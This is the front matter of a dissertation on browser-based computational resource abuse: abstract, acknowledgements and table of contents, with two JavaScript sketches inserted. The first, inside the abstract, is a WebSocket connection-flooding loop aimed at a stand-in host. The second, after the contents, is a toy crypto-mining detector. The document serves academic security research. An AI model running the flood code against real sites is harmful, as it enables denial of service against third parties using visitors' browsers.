Computational Resource Abuse in Web Applications


Computational Resource Abuse in Web Applications

Juan David Parra Rodriguez

Dissertation eingereicht an der Fakultät für Informatik und Mathematik der Universität Passau zur Erlangung des Grades eines Doktors der Naturwissenschaften

A dissertation submitted to the faculty of computer science and mathematics in partial fulfillment of the requirements for the degree of doctor of natural sciences

Betreuer: Prof. Dr. rer. nat. Joachim Posegga

Passau, Germany, April 2019

Abstract

Internet browsers include Application Programming Interfaces (APIs) to support Web applications that require complex functionality, e.g., to let end users watch videos, make phone calls, and play video games. Meanwhile, many Web applications employ these browser APIs to rely on the user's hardware to execute intensive computation, access the Graphics Processing Unit (GPU), use persistent storage, and establish network connections. However, providing access to the system's computational resources, i.e., processing, storage, and networking, through the browser creates an opportunity for attackers to abuse resources. Principally, the problem occurs when an attacker compromises a Web site and includes malicious code to abuse its visitors' computational resources. For example, an attacker can abuse the user's system networking capabilities to perform a Denial of Service (DoS) attack against third parties. What is more, computational resource abuse has not received widespread attention from the Web security community because most of the current specifications are focused on content and session properties such as isolation, confidentiality, and integrity. Our primary goal is to study computational resource abuse and to advance the state of the art by providing a general attacker model, multiple case studies, a thorough analysis of available security mechanisms, and a new detection mechanism.
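The abstract's running example, abusing a visitor's networking capabilities against a third party, can be caricatured in a few lines of browser JavaScript. This is an illustrative sketch only, not the thesis' actual proof of concept: the target host, port list, and round count are invented, and the connection loop is deliberately inert outside a browser.

```javascript
// Sketch of the networking-abuse idea from the abstract. The target
// "victim.example" and all parameters are hypothetical.

// Build WebSocket endpoint URLs for the host under attack.
function buildTargets(host, ports) {
  return ports.map((port) => `ws://${host}:${port}/`);
}

// Repeatedly open (and abandon) connections. Every attempt costs the
// victim a TCP handshake and an HTTP upgrade, while the visiting user
// notices nothing. Returns the number of attempts made.
function flood(targets, rounds) {
  let attempts = 0;
  for (let round = 0; round < rounds; round++) {
    for (const url of targets) {
      attempts += 1;
      // Only attempt real connections inside a browser; inert elsewhere.
      if (typeof window !== "undefined" && "WebSocket" in window) {
        try {
          new window.WebSocket(url);
        } catch (_err) {
          // Connection errors are irrelevant to the attacker.
        }
      }
    }
  }
  return attempts;
}

const targets = buildTargets("victim.example", [80, 8080]);
const attempts = flood(targets, 3); // 2 targets x 3 rounds = 6 attempts
```

A page embedding such a script turns every visitor into an unwitting attack source, which is exactly the asymmetry the abstract describes: the attacker invests almost nothing, while the visitors' machines and networks pay the cost.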
To this end, we implemented and evaluated three scenarios where attackers use multiple browser APIs to abuse networking, local storage, and computation. Depending on the scenario, an attacker can use browsers to perform Denial of Service against third-party Web sites, create a network of browsers to store and distribute arbitrary data, or use browsers to establish anonymous connections similarly to The Onion Router (Tor). Our analysis also includes a real-life resource abuse case found in the wild, i.e., CryptoJacking, where thousands of Web sites forced their visitors to perform crypto-currency mining without their consent. In the general case, the attacks presented in this thesis share the attacker model and two key characteristics: 1) the browser's end user remains oblivious to the attack, and 2) the attacker has to invest few resources in comparison to the resources he obtains. In addition to the analysis of the attacks, we present how existing and upcoming security enforcement mechanisms from Web security can hinder an attacker, along with their drawbacks. Moreover, we propose a novel detection approach based on browser API usage patterns. Finally, we evaluate the accuracy of our detection model, after training it with the real-life crypto-mining scenario, through a large-scale analysis of the most popular Web sites.

Acknowledgements

First of all, I would like to thank Professor Dr. Joachim Posegga for being my advisor and Professor Dr. Jörg Schwenk for taking the time to be the second reviewer of my thesis. I would also like to thank Benjamin Taubmann for presenting in my stead at one of the conferences when I couldn't travel. I would like to thank Eric Rothstein because he made me realize that you can find jobs where they pay you while you break things and put them back together. Also, I would like to thank my colleagues from the IT security chair, with whom I discussed my research, complained about paper rejections, and celebrated paper acceptances.
Especially, I would like to thank Daniel Schreckling, Arne Bilzhause, Henrich Pöhls, Benjamin Taubmann, Eric Rothstein, Luis Ignacio Lopera, and Bastian Braun. Also, I would like to thank Diego Gomez, who took the time to read many of my papers before submission. I would like to specially thank Jorge Cuellar for discussing my research ideas on the way to the train station in Passau and at his office on several occasions, as well as Martin Johns for inviting me to the Dagstuhl seminar on Web Application Security, where I had the chance to get in touch with great researchers in the field and exchange ideas. Also, I would like to thank Siglinde Böck, who helped me to sort out many issues with the University's administration during my trips to conferences. Also, I am grateful for the creation of the open source tools which allowed me to perform all the evaluations in this thesis.¹

I would like to thank my father for encouraging me to think critically and learn how things work at a very young age. Also, I would like to thank my mother for reminding me constantly to follow my dreams. I specially thank my brother, his wife, my nephew, and my niece for letting me explore my own path in life while asking the right questions, at the right time, to help me find my way. Last but definitely not least, I thank my wife for her patience and support while I have been working on this thesis. Without her encouragement, this thesis would have fewer publications associated with it ;-). Thanks to my family and my wife's support, I eventually found my place doing research in Germany.

¹I thought about thanking the creators of awk, ps, cat, grep, sed, uniq, sort, tail, head, scp, pipe, output redirection, the Linux shell, and many other tools, but there are just too many...

Contents

1. Introduction
   1.1. Outline
   1.2. Contributions
   1.3. Associated Publications
   1.4. Other Peer Reviewed Publications

I. Resource Abuse Aspects

2. The Browser Resource Abuse Attack
   2.1. Motivation
   2.2. Attacker Model
   2.3. Generic Attack
   2.4. Code Delivery Methods
        2.4.1. Advertisement Networks
        2.4.2. Modified Dependencies and Browser Plug-Ins
        2.4.3. Attacking Services and Networking
        2.4.4. Stale Inclusions
   2.5. Summary

3. The Current Web Security Model and Its Implications For Computational Resources
   3.1. The Origin-Based Security Model
        3.1.1. CORS
        3.1.2. WebSockets
        3.1.3. PostMessages
        3.1.4. WebRTC
   3.2. Tailoring the Origin-Based Security Model
        3.2.1. Public Suffix List
        3.2.2. Local Storage
        3.2.3. Suborigins
   3.3. Cross-Protocol Issues at Network Level
        3.3.1. WebSockets
        3.3.2. WebRTC
   3.4. Why Can Origin-Based Mechanisms Not Prevent Resource Abuse?
        3.4.1. CORS
        3.4.2. WebSockets
        3.4.3. PostMessages
        3.4.4. WebRTC
   3.5. Summary

II. Resource Abuse Case Studies

4. Abusing Browsers for Denial of Service against Third-Parties
   4.1. Background
   4.2. Proof of Concept
   4.3. Analysis Concerning Browser APIs
        4.3.1. Implementation Differences in Handling WebSockets and WebWorkers
        4.3.2. WebSocket HTTP Header Misinterpretation
   4.4. Evaluation
        4.4.1. Set-up
        4.4.2. Methodology
        4.4.3. Results
   4.5. Related Work
   4.6. Summary

5. Abusing Browsers for Arbitrary Data Storage and Distribution
   5.1. Background
   5.2. Proof of Concept
        5.2.1. Client-Side Building Blocks
        5.2.2. Server-Side Services
        5.2.3. Content Replication Technique
   5.3. Analysis Concerning Browser APIs
   5.4. Evaluation
        5.4.1. Set-Up
        5.4.2. Methodology
        5.4.3. Peer Behaviour
        5.4.4. Results
   5.5. Related Work
   5.6. Summary

6. Abusing Browsers for Anonymous Communication
   6.1. Background
   6.2. Proof of Concept
   6.3. Analysis Concerning Browser APIs
   6.4. Methodology
   6.5. Evaluation of Scalability
        6.5.1. Set-up
        6.5.2. Peer Behaviour
        6.5.3. Results
   6.6. Evaluation of Stealthiness
        6.6.1. Set-up
        6.6.2. Peer Behaviour
        6.6.3. Results
   6.7. Related Work
   6.8. Summary

7. Abusing Browsers for Crypto-Mining
   7.1. Background
   7.2. Analysis Concerning Browser APIs
   7.3. Summary

III. Countermeasures

8. Enforcement Mechanisms
   8.1. User-Controlled Mechanisms
        8.1.1. Blacklists
        8.1.2. Disabling Networking APIs
        8.1.3. Third-Party Tracking Protection
   8.2. Developer-Controlled Mechanisms
        8.2.1. Sand-boxed Environments ..
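The detection idea mentioned in the abstract, recognizing abusive pages by their browser API usage patterns, can be caricatured as a nearest-profile check. Everything below is invented for illustration (the tracked APIs, the mining profile, and the 0.9 threshold); the thesis trains its actual model on real CryptoJacking traces rather than on a hand-written profile.

```javascript
// Toy sketch of API-usage-pattern detection. The APIs tracked, the
// reference profile, and the threshold are illustrative assumptions.
const APIS = ["WebSocket", "WebWorker", "WebAssembly", "localStorage"];

// Normalize raw per-API call counts into a unit-length feature vector.
function toVector(counts) {
  const v = APIS.map((api) => counts[api] || 0);
  const norm = Math.hypot(...v) || 1;
  return v.map((x) => x / norm);
}

// Cosine similarity between two unit vectors: 1 means an identical mix
// of API usage, 0 means completely different APIs were used.
function similarity(a, b) {
  return a.reduce((sum, x, i) => sum + x * b[i], 0);
}

// Hypothetical profile of a crypto-mining page: heavy WebAssembly and
// WebWorker activity plus a little WebSocket traffic to the mining pool.
const MINING_PROFILE = toVector({ WebAssembly: 50, WebWorker: 8, WebSocket: 4 });

function looksLikeMining(counts, threshold = 0.9) {
  return similarity(toVector(counts), MINING_PROFILE) >= threshold;
}
```

A page whose call counts are proportional to the profile scores a similarity of 1 and is flagged, while a page that mostly touches localStorage scores near 0 and passes; the normalization step is what makes the check sensitive to the usage mix rather than to absolute call volume.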